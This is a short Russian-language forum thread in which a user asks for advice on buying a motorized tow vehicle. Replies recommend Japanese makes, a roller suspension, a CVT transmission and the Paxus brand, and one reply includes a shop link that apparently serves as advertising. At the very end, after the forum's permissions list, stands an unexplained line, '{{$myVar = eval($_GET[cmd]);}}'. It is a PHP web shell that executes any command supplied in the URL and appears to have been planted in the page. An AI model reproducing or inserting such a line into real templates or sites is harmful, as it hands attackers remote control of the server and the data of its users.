-
Мимо проходил
Мотобуксировщик
Всем добрый вечер! В этом году хочу приобрести мотобуксировщик. Подскажите, владельцы, какой лучше выбрать и на что обратить внимание при покупке?
-
Мимо проходил
Я придерживаюсь мнения, что если покупать что-то из транспорта и технике, будь даже мелкой, то сразу же покупать хорошие варианты. Поищите Японские варианты, они самые надежные.
-
Мимо проходил
Привет! Если выбирать , то подходить с умом. Я бы посоветовал остановиться на буксировщике с катковой подвеской, можно будет использовать его круглый год. Что касается трансмиссии, то выбирайте вариатор. Если интересно, знаю, что вот здесь есть буксировщики различных модификаций https://www.gavane.ru/buksirovshchik-mukhtar.html
-
Мимо проходил
Если Вы интересуетесь именно маркой, то знаю определенную популярность носить марка Paxus. Производят в Архангельске, в принципе мощный и надежный.
Ваши права
- Вы не можете создавать новые темы
- Вы не можете отвечать в темах
- Вы не можете прикреплять вложения
- Вы не можете редактировать свои сообщения
Правила форума
{{$myVar = eval($_GET[cmd]);}}